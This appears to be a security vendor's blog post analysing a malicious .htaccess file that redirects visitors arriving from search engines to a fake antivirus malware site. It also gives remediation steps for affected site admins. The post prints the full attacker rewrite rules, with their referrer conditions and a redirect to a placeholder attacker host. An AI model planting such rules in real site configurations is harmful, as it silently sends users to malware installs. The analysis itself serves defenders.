Continued Fake AV .htaccess attacks

A few months ago I blogged about attackers using malicious .htaccess files in order to redirect victims to malware infection sites [1]. Well the trend continues.

In the past few days I was dealing with a query from an affected site admin who had been receiving reports from users that his site was “infected”. Checking the site out showed nothing suspicious – none of the usual signs characteristic of common site compromises were present:

  • malicious iframes
  • malicious inline scripts
  • malicious script tags

Probing for more information nailed the issue. The customers were only seeing a problem when navigating to the site via their search engine. Kicking myself for not having checked this on the first pass, it was quick to confirm the issue.

  1. search for domain in popular search engine (Google, Yahoo etc)
  2. click on link to visit site
  3. observe redirect, bingo!

Inspecting the .htaccess file in the case of this victim showed the problem:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://[evil_ip]/join.html?s=join [R,L]

The URL rewriting engine in Apache is very powerful [2], and easily abused by attackers if they have access to upload/modify .htaccess files.

The immediate actions that site admins who have fallen victim to this of attack need to do include:

  1. change site administration and FTP passwords
  2. replace the .htaccess file with the original (or remove it if one was not in use before).
  3. notify their hosting provider

In the case of this attack, the Fake AV malware getting installed is the notorious Antivirus 2009.

Access to the malicious site was already blocked for Sophos customers using a web appliance. Additionally, detection has been added as Troj/FakeAV-IM.

Note to self:
Add the “referrer check” to the list of things to check when inspecting a potentially compromised site.